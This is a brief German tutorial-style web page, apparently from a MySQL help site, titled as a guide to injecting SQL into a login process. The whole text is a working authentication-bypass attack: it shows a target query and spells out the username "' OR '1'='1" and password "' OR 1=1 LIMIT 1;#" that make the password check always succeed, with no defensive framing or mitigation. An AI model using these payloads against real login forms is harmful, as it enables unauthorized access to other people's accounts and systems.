Mysql
 sql >> Datenbank >  >> RDS >> Mysql

Wie man SQL in den Anmeldeprozess einfügt

Beginnend mit der Zielabfrage:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Wir erhalten den Benutzernamen ' OR '1'='1 und das Passwort ' OR 1=1 LIMIT 1;#